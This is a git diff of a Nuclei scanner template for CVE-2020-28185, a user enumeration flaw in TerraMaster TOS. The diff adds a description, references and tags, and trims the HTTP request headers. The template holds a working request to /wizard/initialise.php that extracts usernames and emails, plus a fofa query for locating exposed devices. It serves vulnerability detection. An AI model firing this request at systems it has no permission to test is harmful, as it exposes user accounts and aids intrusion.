diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml index 305c9a9c91..fa96180314 100644 --- a/http/cves/2020/CVE-2020-28185.yaml +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -4,24 +4,23 @@ info: name: TerraMaster TOS < 4.2.06 - User Enumeration author: pussycat0x severity: medium + description: | + User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php. reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md - https://nvd.nist.gov/vuln/detail/CVE-2020-28185 + - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ metadata: max-request: 1 verified: true fofa-query: '"TerraMaster" && header="TOS"' - tags: tamronos,enum + tags: cve,cve2020,tamronos,enum,tos http: - raw: - | GET /tos/index.php?user/login HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - | POST /wizard/initialise.php HTTP/1.1 @@ -29,7 +28,7 @@ http: Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest - Referer: {{BaseURL}}/tos/index.php?user/login + Referer: {{RootURL}}/tos/index.php?user/login tab=checkuser&username=admin @@ -53,4 +52,4 @@ http: part: body_2 regex: - '"username":"(.*?)"' - - '"email":"(.*?)"' \ No newline at end of file + - '"email":"(.*?)"'